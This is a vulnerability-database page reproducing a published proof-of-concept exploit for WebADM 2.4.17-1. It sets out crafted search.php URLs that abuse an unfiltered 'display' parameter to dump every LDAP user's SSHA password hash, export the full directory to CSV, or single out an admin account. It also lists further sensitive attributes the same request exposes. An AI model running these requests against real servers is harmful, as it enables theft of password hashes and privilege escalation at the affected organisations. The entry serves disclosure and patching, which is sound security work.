Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 WebADM 2.4.17-1 Password Hash Disclosure

🗓️ 27 Apr 2026 00:00:00Reported by Chokri HammediType 
packetstorm
 packetstorm🔗 packetstorm.news👁 47 Views

Authenticated information disclosure in WebADM 2.4.17-1 leaks LDAP password hashes to admins via display parameter.

Code
# Exploit Title: WebADM v2.4.17-1 - Authenticated LDAP Password Hash
    Disclosure
    # Date: 2026-04-27
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.rcdevs.com/
    # Software Link: https://www.rcdevs.com/downloads/
    # Version: 2.4.17-1 (Freeware Edition)
    # Tested on: Linux, WebADM Freeware Edition
    
    
    # Description:
    # WebADM v2.4.17-1 contains an authenticated information disclosure
    vulnerability
    # in the LDAP search functionality. The `display` parameter in search.php
    accepts
    # any LDAP attribute without server-side validation. A low-privileged admin
    can
    # retrieve SSHA password hashes for ALL LDAP users including super admins
    via a
    # crafted URL, enabling privilege escalation through offline hash cracking.
    
    
    # Proof of Concept:
    #
    # 1. Login to WebADM at:
    #    https://TARGET_IP:10000/admin/
    #
    # 2. After login, note the session ID in URL:
    #    https://TARGET_IP:10000/admin/SESSION_ID/index.php
    #
    # 3. Dump password hashes via direct URL:
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)
    #
    # 4. Full LDAP dump (all attributes):
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(objectClass=*)
    #
    # 5. Export all data as CSV:
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&export=true&display=*&container=dc=nodomain&filter=(objectClass=*)
    #
    # 6. Target specific user:
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(cn=admin)
    #
    # Example vulnerable URL (tested on Debian):
    #
    https://192.168.1.104:10000/admin/4FWF711NQTL029JW/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)
    #
    # Result:
    # cn=admin,dc=nodomain
    # Password: {SSHA}2wjGZ6opxxxxxxxx
    # cn=svc_webadm,dc=nodomain
    # Password: {SSHA}3qpxxxxxx
    
    # Vulnerable Parameters in URL:
    # display=cn,userpassword    <- Accepts any LDAP attribute (no server-side
    filtering)
    # container=dc=nodomain      <- LDAP base DN to search
    # scope=sub                  <- Searches entire subtree
    # filter=(objectClass=*)     <- Matches all LDAP objects
    # export=true                <- Export all data to CSV file
    
    # Other sensitive attributes accessible via display parameter:
    # display=userpassword       <- SSHA password hashes
    # display=unicodepwd          <- Active Directory NT hashes
    # display=webadmData          <- Encrypted WebADM application data
    # display=webadmSettings      <- WebADM configuration settings
    # display=webadmType          <- Object type definitions
    # display=userCertificate     <- X.509 certificates
    # display=mail,mobile         <- User PII (email, phone numbers)
    # display=member,memberof     <- Group membership/privilege mapping
    # display=*                   <- ALL attributes including OpenLDAP internals
    # display=*+showall=on         <- Return all attributes including internal
    ones

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Apr 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
webadm vulnerabilityldap disclosurepassword hashesdisplay parameterauthenticated accessprivilege escalation
47